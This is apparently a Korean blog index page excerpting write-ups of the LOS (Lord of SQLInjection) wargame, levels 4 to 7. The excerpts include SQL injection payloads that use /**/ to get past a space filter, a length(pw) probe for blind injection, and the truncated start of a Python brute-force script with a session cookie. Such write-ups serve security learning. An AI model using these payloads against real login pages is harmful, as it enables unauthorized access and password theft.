C. 웹/실습28 [LOS] 7번 orge ㅎㅇ or와 and 필터링을 우회해서 비밀번호를 알아내자하나하나 하기가 귀찮아서 파이썬 Brute force코드를 짜보았다. 12345678910111213141516171819202122import requests URL = 'https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php'head = {'cookie' : 'PHPSESSID=gcraruf8evku7kbdhoq9vqo986; _cfduid=de63e93b1fee3ab4d7fa46e679599d9381503410506'} def answer(num): for a in range(1,num+1): for b in range(48,128): params_b = {'pw' : "'||.. 2017. 8. 25. [LOS] 6번 darkelf ㅎㅇ or 필터링을 우회해서 id = admin이 되도록 쿼리를 작성하면 끝! 2017. 8. 25. [LOS] 5번 wolfman ㅎㅇ id가 admin이면 문제가 풀리고 공백이 필터링 되어있는 문제인것같다. 원래대로라면 ?pw=a' or id='admin 이렇게 입력하면 되는 문제이지만 공백이 필터링 되었기에 /**/를 사용해서?pw=a'/**/or/**/id='admin 이렇게 입력하면 Clear! 2017. 8. 3. [LOS] 4번 orc ㅎㅇ 코드를 보니깐 Helllo admin이 나오면 참인 것을 이용하여 pw를 알아내는 Blind SQL Injection 문제인 것 같다. 먼저 pw의 길이를 알아내기 위해서?pw=a' or 1=1 or length(pw) 2017. 8. 3. 이전 1 2 3 4 5 ··· 7 다음 반응형